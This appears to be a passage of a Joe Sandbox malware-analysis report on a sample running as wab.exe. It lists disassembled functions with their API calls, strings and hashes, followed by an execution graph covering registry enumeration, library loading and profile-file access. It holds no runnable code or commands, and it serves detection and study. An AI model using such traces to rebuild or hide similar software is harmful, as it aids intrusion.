                    Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _snwprintf
                    • String ID: %%-%d.%ds
                    • API String ID: 3988819677-2008345750
                    • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                    • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                    • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                    • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                    Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040E770
                    • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: MessageSendmemset
                    • String ID: F^@
                    • API String ID: 568519121-3652327722
                    • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                    • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                    • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                    • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                    Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: PlacementWindowmemset
                    • String ID: WinPos
                    • API String ID: 4036792311-2823255486
                    • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                    • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                    • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                    • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                    Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                    • wcsrchr.MSVCRT ref: 0040DCE9
                    • wcscat.MSVCRT ref: 0040DCFF
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileModuleNamewcscatwcsrchr
                    • String ID: _lng.ini
                    • API String ID: 383090722-1948609170
                    • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                    • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                    • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                    • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                    Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                    • String ID: SHGetSpecialFolderPathW$shell32.dll
                    • API String ID: 2773794195-880857682
                    • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                    • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                    • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                    • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                    Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset
                    • String ID:
                    • API String ID: 438689982-0
                    • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                    • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                    • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                    • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                    Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@$memset
                    • String ID:
                    • API String ID: 1860491036-0
                    • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                    • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                    • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                    • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                    Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                    Download Yara Rule
                    APIs
                    • memcmp.MSVCRT ref: 00408AF3
                      • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                      • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                      • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                    • memcmp.MSVCRT ref: 00408B2B
                    • memcmp.MSVCRT ref: 00408B5C
                    • memcpy.MSVCRT ref: 00408B79
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcmp$memcpy
                    • String ID:
                    • API String ID: 231171946-0
                    • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                    • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                    • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                    • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                    Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcslen$wcscat$wcscpy
                    • String ID:
                    • API String ID: 1961120804-0
                    • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                    • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                    • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                    • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                    Execution Graph

                    Execution Coverage:2.3%
                    Dynamic/Decrypted Code Coverage:20.7%
                    Signature Coverage:0.5%
                    Total number of Nodes:835
                    Total number of Limit Nodes:17
                    execution_graph 33810 40fc40 70 API calls 33983 403640 21 API calls 33811 427fa4 42 API calls 33984 412e43 _endthreadex 33985 425115 76 API calls __fprintf_l 33986 43fe40 133 API calls 33814 425115 83 API calls __fprintf_l 33815 401445 memcpy memcpy DialogBoxParamA 33816 440c40 34 API calls 32938 444c4a 32957 444e38 32938->32957 32940 444c56 GetModuleHandleA 32941 444c68 __set_app_type __p__fmode __p__commode 32940->32941 32943 444cfa 32941->32943 32944 444d02 __setusermatherr 32943->32944 32945 444d0e 32943->32945 32944->32945 32958 444e22 _controlfp 32945->32958 32947 444d13 _initterm __getmainargs _initterm 32948 444d6a GetStartupInfoA 32947->32948 32950 444d9e GetModuleHandleA 32948->32950 32959 40cf44 32950->32959 32954 444dcf _cexit 32956 444e04 32954->32956 32955 444dc8 exit 32955->32954 32957->32940 32958->32947 33010 404a99 LoadLibraryA 32959->33010 32961 40cf60 32962 40cf64 32961->32962 33018 410d0e 32961->33018 32962->32954 32962->32955 32964 40cf6f 33022 40ccd7 ??2@YAPAXI 32964->33022 32966 40cf9b 33036 407cbc 32966->33036 32971 40cfc4 33054 409825 memset 32971->33054 32972 40cfd8 33059 4096f4 memset 32972->33059 32977 407e30 _strcmpi 32981 40cfee 32977->32981 32978 40d181 ??3@YAXPAX 32979 40d1b3 32978->32979 32980 40d19f DeleteObject 32978->32980 33083 407948 ??3@YAXPAX ??3@YAXPAX 32979->33083 32980->32979 32983 40cff2 RegDeleteKeyA 32981->32983 32984 40d007 EnumResourceTypesA 32981->32984 32983->32978 32986 40d047 32984->32986 32987 40d02f MessageBoxA 32984->32987 32985 40d1c4 33084 4080d4 ??3@YAXPAX 32985->33084 32989 40d0a0 CoInitialize 32986->32989 33064 40ce70 32986->33064 32987->32978 33081 40cc26 strncat memset RegisterClassA CreateWindowExA 32989->33081 32990 40d1cd 33085 407948 ??3@YAXPAX ??3@YAXPAX 32990->33085 32993 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33082 40c256 PostMessageA 32993->33082 32997 40d061 ??3@YAXPAX 32997->32979 33000 40d084 DeleteObject 32997->33000 32998 40d09e 32998->32989 33000->32979 33002 40d0f9 GetMessageA 33003 40d17b 33002->33003 33004 40d10d 33002->33004 33003->32978 33005 40d113 TranslateAccelerator 33004->33005 33007 40d145 IsDialogMessage 33004->33007 33008 40d139 IsDialogMessage 33004->33008 33005->33004 33006 40d16d GetMessageA 33005->33006 33006->33003 33006->33005 33007->33006 33009 40d157 TranslateMessage DispatchMessageA 33007->33009 33008->33006 33008->33007 33009->33006 33011 404ac4 GetProcAddress 33010->33011 33014 404aec 33010->33014 33012 404add FreeLibrary 33011->33012 33015 404ad4 33011->33015 33013 404ae8 33012->33013 33012->33014 33013->33014 33016 404b13 33014->33016 33017 404afc MessageBoxA 33014->33017 33015->33012 33016->32961 33017->32961 33019 410d17 LoadLibraryA 33018->33019 33020 410d3c 33018->33020 33019->33020 33021 410d2b GetProcAddress 33019->33021 33020->32964 33021->33020 33023 40cd08 ??2@YAPAXI 33022->33023 33025 40cd26 33023->33025 33026 40cd2d 33023->33026 33093 404025 6 API calls 33025->33093 33028 40cd66 33026->33028 33029 40cd59 DeleteObject 33026->33029 33086 407088 33028->33086 33029->33028 33031 40cd6b 33089 4019b5 33031->33089 33034 4019b5 strncat 33035 40cdbf _mbscpy 33034->33035 33035->32966 33095 407948 ??3@YAXPAX ??3@YAXPAX 33036->33095 33038 407cf7 33041 407ddc 33038->33041 33042 407a1f malloc memcpy ??3@YAXPAX ??3@YAXPAX 33038->33042 33044 407d7a ??3@YAXPAX 33038->33044 33049 407e04 33038->33049 33099 40796e 7 API calls 33038->33099 33100 406f30 33038->33100 33041->33049 33108 407a1f 33041->33108 33042->33038 33044->33038 33096 407a55 33049->33096 33050 407e30 33051 407e57 33050->33051 33052 407e38 33050->33052 33051->32971 33051->32972 33052->33051 33053 407e41 _strcmpi 33052->33053 33053->33051 33053->33052 33114 4097ff 33054->33114 33056 409854 33119 409731 33056->33119 33060 4097ff 3 API calls 33059->33060 33061 409723 33060->33061 33139 40966c 33061->33139 33153 4023b2 33064->33153 33070 40ced3 33242 40cdda 7 API calls 33070->33242 33071 40cece 33074 40cf3f 33071->33074 33194 40c3d0 memset GetModuleFileNameA strrchr 33071->33194 33074->32997 33074->32998 33077 40ceed 33221 40affa 33077->33221 33081->32993 33082->33002 33083->32985 33084->32990 33085->32962 33094 406fc7 memset _mbscpy 33086->33094 33088 40709f CreateFontIndirectA 33088->33031 33090 4019e1 33089->33090 33091 4019c2 strncat 33090->33091 33092 4019e5 memset LoadIconA 33090->33092 33091->33090 33092->33034 33093->33026 33094->33088 33095->33038 33097 407a65 33096->33097 33098 407a5b ??3@YAXPAX 33096->33098 33097->33050 33098->33097 33099->33038 33101 406f37 malloc 33100->33101 33102 406f7d 33100->33102 33104 406f73 33101->33104 33105 406f58 33101->33105 33102->33038 33104->33038 33106 406f6c ??3@YAXPAX 33105->33106 33107 406f5c memcpy 33105->33107 33106->33104 33107->33106 33109 407a38 33108->33109 33110 407a2d ??3@YAXPAX 33108->33110 33112 406f30 3 API calls 33109->33112 33111 407a43 33110->33111 33113 40796e 7 API calls 33111->33113 33112->33111 33113->33049 33130 406f96 GetModuleFileNameA 33114->33130 33116 409805 strrchr 33117 409814 33116->33117 33118 409817 _mbscat 33116->33118 33117->33118 33118->33056 33131 44b090 33119->33131 33124 40930c 3 API calls 33125 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33124->33125 33126 4097c5 LoadStringA 33125->33126 33127 4097db 33126->33127 33127->33126 33129 4097f3 33127->33129 33138 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33127->33138 33129->32978 33130->33116 33132 40973e _mbscpy _mbscpy 33131->33132 33133 40930c 33132->33133 33134 44b090 33133->33134 33135 409319 memset GetPrivateProfileStringA 33134->33135 33136 409374 33135->33136 33137 409364 WritePrivateProfileStringA 33135->33137 33136->33124 33137->33136 33138->33127 33149 406f81 GetFileAttributesA 33139->33149 33141 409675 33142 4096ee 33141->33142 33143 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33141->33143 33142->32977 33150 409278 GetPrivateProfileStringA 33143->33150 33145 4096c9 33151 409278 GetPrivateProfileStringA 33145->33151 33147 4096da 33152 409278 GetPrivateProfileStringA 33147->33152 33149->33141 33150->33145 33151->33147 33152->33142 33244 409c1c 33153->33244 33156 401e69 memset 33283 410dbb 33156->33283 33159 401ec2 33313 4070e3 strlen _mbscat _mbscpy _mbscat 33159->33313 33160 401ed4 33298 406f81 GetFileAttributesA 33160->33298 33163 401ee6 strlen strlen 33165 401f15 33163->33165 33166 401f28 33163->33166 33314 4070e3 strlen _mbscat _mbscpy _mbscat 33165->33314 33299 406f81 GetFileAttributesA 33166->33299 33169 401f35 33300 401c31 33169->33300 33172 401f75 33312 410a9c RegOpenKeyExA 33172->33312 33173 401c31 7 API calls 33173->33172 33175 401f91 33176 402187 33175->33176 33177 401f9c memset 33175->33177 33179 402195 ExpandEnvironmentStringsA 33176->33179 33180 4021a8 _strcmpi 33176->33180 33315 410b62 RegEnumKeyExA 33177->33315 33324 406f81 GetFileAttributesA 33179->33324 33180->33070 33180->33071 33182 40217e RegCloseKey 33182->33176 33183 401fd9 atoi 33184 401fef memset memset sprintf 33183->33184 33192 401fc9 33183->33192 33316 410b1e 33184->33316 33187 402165 33187->33182 33188 402076 memset memset strlen strlen 33188->33192 33189 4020dd strlen strlen 33189->33192 33190 4070e3 strlen _mbscat _mbscpy _mbscat 33190->33192 33191 406f81 GetFileAttributesA 33191->33192 33192->33182 33192->33183 33192->33187 33192->33188 33192->33189 33192->33190 33192->33191 33193 402167 _mbscpy 33192->33193 33323 410b62 RegEnumKeyExA 33192->33323 33193->33182 33195 40c422 33194->33195 33196 40c425 _mbscat _mbscpy _mbscpy 33194->33196 33195->33196 33197 40c49d 33196->33197 33198 40c512 33197->33198 33199 40c502 GetWindowPlacement 33197->33199 33200 40c538 33198->33200 33345 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33198->33345 33199->33198 33338 409b31 33200->33338 33204 40ba28 33205 40ba87 33204->33205 33209 40ba3c 33204->33209 33348 406c62 LoadCursorA SetCursor 33205->33348 33207 40ba8c 33349 404734 33207->33349 33357 403c16 33207->33357 33433 404785 33207->33433 33436 410a9c RegOpenKeyExA 33207->33436 33437 4107f1 33207->33437 33208 40ba43 _mbsicmp 33208->33209 33209->33205 33209->33208 33440 40b5e5 10 API calls 33209->33440 33210 40baa0 33211 407e30 _strcmpi 33210->33211 33213 40bab0 33211->33213 33212 40bafa SetCursor 33212->33077 33213->33212 33215 40baf1 qsort 33213->33215 33215->33212 33803 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33221->33803 33223 40b00e 33224 40b016 33223->33224 33225 40b01f GetStdHandle 33223->33225 33804 406d1a CreateFileA 33224->33804 33227 40b01c 33225->33227 33228 40b035 33227->33228 33229 40b12d 33227->33229 33805 406c62 LoadCursorA SetCursor 33228->33805 33809 406d77 9 API calls 33229->33809 33232 40b136 33243 40c580 28 API calls 33232->33243 33233 40b087 33240 40b0a1 33233->33240 33807 40a699 12 API calls 33233->33807 33234 40b042 33234->33233 33234->33240 33806 40a57c strlen WriteFile 33234->33806 33237 40b0d6 33238 40b116 CloseHandle 33237->33238 33239 40b11f SetCursor 33237->33239 33238->33239 33239->33232 33240->33237 33808 406d77 9 API calls 33240->33808 33242->33071 33243->33074 33256 409a32 33244->33256 33247 409c80 memcpy memcpy 33248 409cda 33247->33248 33248->33247 33249 409d18 ??2@YAPAXI ??2@YAPAXI 33248->33249 33250 408db6 12 API calls 33248->33250 33251 409d54 ??2@YAPAXI 33249->33251 33253 409d8b 33249->33253 33250->33248 33251->33253 33253->33253 33266 409b9c 33253->33266 33255 4023c1 33255->33156 33257 409a44 33256->33257 33258 409a3d ??3@YAXPAX 33256->33258 33259 409a52 33257->33259 33260 409a4b ??3@YAXPAX 33257->33260 33258->33257 33261 409a63 33259->33261 33262 409a5c ??3@YAXPAX 33259->33262 33260->33259 33263 409a83 ??2@YAPAXI ??2@YAPAXI 33261->33263 33264 409a73 ??3@YAXPAX 33261->33264 33265 409a7c ??3@YAXPAX 33261->33265 33262->33261 33263->33247 33264->33265 33265->33263 33267 407a55 ??3@YAXPAX 33266->33267 33268 409ba5 33267->33268 33269 407a55 ??3@YAXPAX 33268->33269 33270 409bad 33269->33270 33271 407a55 ??3@YAXPAX 33270->33271 33272 409bb5 33271->33272 33273 407a55 ??3@YAXPAX 33272->33273 33274 409bbd 33273->33274 33275 407a1f 4 API calls 33274->33275 33276 409bd0 33275->33276 33277 407a1f 4 API calls 33276->33277 33278 409bda 33277->33278 33279 407a1f 4 API calls 33278->33279 33280 409be4 33279->33280 33281 407a1f 4 API calls 33280->33281 33282 409bee 33281->33282 33282->33255 33284 410d0e 2 API calls 33283->33284 33285 410dca 33284->33285 33286 410dfd memset 33285->33286 33325 4070ae 33285->33325 33287 410e1d 33286->33287 33328 410a9c RegOpenKeyExA 33287->33328 33291 401e9e strlen strlen 33291->33159 33291->33160 33292 410e4a 33293 410e7f _mbscpy 33292->33293 33329 410d3d _mbscpy 33292->33329 33293->33291 33295 410e5b 33330 410add RegQueryValueExA 33295->33330 33297 410e73 RegCloseKey 33297->33293 33298->33163 33299->33169 33331 410a9c RegOpenKeyExA 33300->33331 33302 401c4c 33303 401cad 33302->33303 33332 410add RegQueryValueExA 33302->33332 33303->33172 33303->33173 33305 401c6a 33306 401c71 strchr 33305->33306 33307 401ca4 RegCloseKey 33305->33307 33306->33307 33308 401c85 strchr 33306->33308 33307->33303 33308->33307 33309 401c94 33308->33309 33333 406f06 strlen 33309->33333 33311 401ca1 33311->33307 33312->33175 33313->33160 33314->33166 33315->33192 33336 410a9c RegOpenKeyExA 33316->33336 33318 410b34 33319 410b5d 33318->33319 33337 410add RegQueryValueExA 33318->33337 33319->33192 33321 410b4c RegCloseKey 33321->33319 33323->33192 33324->33180 33326 4070bd GetVersionExA 33325->33326 33327 4070ce 33325->33327 33326->33327 33327->33286 33327->33291 33328->33292 33329->33295 33330->33297 33331->33302 33332->33305 33334 406f17 33333->33334 33335 406f1a memcpy 33333->33335 33334->33335 33335->33311 33336->33318 33337->33321 33339 409b40 33338->33339 33341 409b4e 33338->33341 33346 409901 memset SendMessageA 33339->33346 33342 409b99 33341->33342 33343 409b8b 33341->33343 33342->33204 33347 409868 SendMessageA 33343->33347 33345->33200 33346->33341 33347->33342 33348->33207 33350 404785 FreeLibrary 33349->33350 33351 40473b LoadLibraryA 33350->33351 33352 40474c GetProcAddress 33351->33352 33353 40476e 33351->33353 33352->33353 33354 404764 33352->33354 33355 404781 33353->33355 33356 404785 FreeLibrary 33353->33356 33354->33353 33355->33210 33356->33355 33358 4107f1 FreeLibrary 33357->33358 33359 403c30 LoadLibraryA 33358->33359 33360 403c74 33359->33360 33361 403c44 GetProcAddress 33359->33361 33362 4107f1 FreeLibrary 33360->33362 33361->33360 33363 403c5e 33361->33363 33364 403c7b 33362->33364 33363->33360 33366 403c6b 33363->33366 33365 404734 3 API calls 33364->33365 33367 403c86 33365->33367 33366->33364 33441 4036e5 33367->33441 33370 4036e5 26 API calls 33371 403c9a 33370->33371 33372 4036e5 26 API calls 33371->33372 33373 403ca4 33372->33373 33374 4036e5 26 API calls 33373->33374 33375 403cae 33374->33375 33453 4085d2 33375->33453 33383 403ce5 33384 403cf7 33383->33384 33636 402bd1 39 API calls 33383->33636 33499 410a9c RegOpenKeyExA 33384->33499 33387 403d0a 33388 403d1c 33387->33388 33637 402bd1 39 API calls 33387->33637 33500 402c5d 33388->33500 33392 4070ae GetVersionExA 33393 403d31 33392->33393 33518 410a9c RegOpenKeyExA 33393->33518 33395 403d51 33396 403d61 33395->33396 33638 402b22 46 API calls 33395->33638 33519 410a9c RegOpenKeyExA 33396->33519 33399 403d87 33400 403d97 33399->33400 33639 402b22 46 API calls 33399->33639 33520 410a9c RegOpenKeyExA 33400->33520 33403 403dbd 33404 403dcd 33403->33404 33640 402b22 46 API calls 33403->33640 33521 410808 33404->33521 33408 404785 FreeLibrary 33409 403de8 33408->33409 33525 402fdb 33409->33525 33412 402fdb 34 API calls 33413 403e00 33412->33413 33541 4032b7 33413->33541 33422 403e3b 33424 403e73 33422->33424 33425 403e46 _mbscpy 33422->33425 33588 40fb00 33424->33588 33642 40f334 334 API calls 33425->33642 33434 4047a3 33433->33434 33435 404799 FreeLibrary 33433->33435 33434->33210 33435->33434 33436->33210 33438 410807 33437->33438 33439 4107fc FreeLibrary 33437->33439 33438->33210 33439->33438 33440->33209 33442 4037c5 33441->33442 33443 4036fb 33441->33443 33442->33370 33643 410863 UuidFromStringA UuidFromStringA memcpy 33443->33643 33445 40370e 33445->33442 33446 403716 strchr 33445->33446 33446->33442 33447 403730 33446->33447 33644 4021b6 memset 33447->33644 33449 40373f _mbscpy _mbscpy strlen 33450 4037a4 _mbscpy 33449->33450 33451 403789 sprintf 33449->33451 33645 4023e5 16 API calls 33450->33645 33451->33450 33454 4085e2 33453->33454 33646 4082cd 11 API calls 33454->33646 33458 408600 33459 403cba 33458->33459 33460 40860b memset 33458->33460 33471 40821d 33459->33471 33649 410b62 RegEnumKeyExA 33460->33649 33462 4086d2 RegCloseKey 33462->33459 33464 408637 33464->33462 33465 40865c memset 33464->33465 33650 410a9c RegOpenKeyExA 33464->33650 33653 410b62 RegEnumKeyExA 33464->33653 33651 410add RegQueryValueExA 33465->33651 33468 408694 33652 40848b 10 API calls 33468->33652 33470 4086ab RegCloseKey 33470->33464 33654 410a9c RegOpenKeyExA 33471->33654 33473 40823f 33474 403cc6 33473->33474 33475 408246 memset 33473->33475 33483 4086e0 33474->33483 33655 410b62 RegEnumKeyExA 33475->33655 33477 4082bf RegCloseKey 33477->33474 33479 40826f 33479->33477 33656 410a9c RegOpenKeyExA 33479->33656 33657 4080ed 11 API calls 33479->33657 33658 410b62 RegEnumKeyExA 33479->33658 33482 4082a2 RegCloseKey 33482->33479 33659 4045db 33483->33659 33485 4088ef 33667 404656 33485->33667 33489 408737 wcslen 33489->33485 33492 40876a 33489->33492 33490 40877a _wcsncoll 33490->33492 33492->33485 33492->33490 33493 404734 3 API calls 33492->33493 33494 404785 FreeLibrary 33492->33494 33495 408812 memset 33492->33495 33496 40883c memcpy wcschr 33492->33496 33497 4088c3 LocalFree 33492->33497 33670 40466b _mbscpy 33492->33670 33493->33492 33494->33492 33495->33492 33495->33496 33496->33492 33497->33492 33498 410a9c RegOpenKeyExA 33498->33383 33499->33387 33671 410a9c RegOpenKeyExA 33500->33671 33502 402c7a 33503 402da5 33502->33503 33504 402c87 memset 33502->33504 33503->33392 33672 410b62 RegEnumKeyExA 33504->33672 33506 402d9c RegCloseKey 33506->33503 33507 410b1e 3 API calls 33508 402ce4 memset sprintf 33507->33508 33673 410a9c RegOpenKeyExA 33508->33673 33510 402d28 33511 402d3a sprintf 33510->33511 33674 402bd1 39 API calls 33510->33674 33675 410a9c RegOpenKeyExA 33511->33675 33516 402cb2 33516->33506 33516->33507 33517 402d9a 33516->33517 33676 402bd1 39 API calls 33516->33676 33677 410b62 RegEnumKeyExA 33516->33677 33517->33506 33518->33395 33519->33399 33520->33403 33522 410816 33521->33522 33523 4107f1 FreeLibrary 33522->33523 33524 403ddd 33523->33524 33524->33408 33678 410a9c RegOpenKeyExA 33525->33678 33527 402ff9 33528 403006 memset 33527->33528 33529 40312c 33527->33529 33679 410b62 RegEnumKeyExA 33528->33679 33529->33412 33531 403122 RegCloseKey 33531->33529 33532 410b1e 3 API calls 33533 403058 memset sprintf 33532->33533 33680 410a9c RegOpenKeyExA 33533->33680 33535 403033 33535->33531 33535->33532 33536 4030a2 memset 33535->33536 33538 410b62 RegEnumKeyExA 33535->33538 33539 4030f9 RegCloseKey 33535->33539 33682 402db3 26 API calls 33535->33682 33681 410b62 RegEnumKeyExA 33536->33681 33538->33535 33539->33535 33542 4032d5 33541->33542 33543 4033a9 33541->33543 33683 4021b6 memset 33542->33683 33556 4034e4 memset memset 33543->33556 33545 4032e1 33684 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33545->33684 33547 4032ea 33548 4032f8 memset GetPrivateProfileSectionA 33547->33548 33685 4023e5 16 API calls 33547->33685 33548->33543 33553 40332f 33548->33553 33550 40339b strlen 33550->33543 33550->33553 33552 403350 strchr 33552->33553 33553->33543 33553->33550 33686 4021b6 memset 33553->33686 33687 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33553->33687 33688 4023e5 16 API calls 33553->33688 33557 410b1e 3 API calls 33556->33557 33558 40353f 33557->33558 33559 40357f 33558->33559 33560 403546 _mbscpy 33558->33560 33564 403985 33559->33564 33689 406d55 strlen _mbscat 33560->33689 33562 403565 _mbscat 33690 4033f0 19 API calls 33562->33690 33691 40466b _mbscpy 33564->33691 33568 4039aa 33570 4039ff 33568->33570 33692 40f460 memset memset 33568->33692 33713 40f6e2 33568->33713 33729 4038e8 21 API calls 33568->33729 33571 404785 FreeLibrary 33570->33571 33572 403a0b 33571->33572 33573 4037ca memset memset 33572->33573 33737 444551 memset 33573->33737 33576 4038e2 33576->33422 33641 40f334 334 API calls 33576->33641 33578 40382e 33579 406f06 2 API calls 33578->33579 33580 403843 33579->33580 33581 406f06 2 API calls 33580->33581 33582 403855 strchr 33581->33582 33583 403884 _mbscpy 33582->33583 33584 403897 strlen 33582->33584 33585 4038bf _mbscpy 33583->33585 33584->33585 33586 4038a4 sprintf 33584->33586 33749 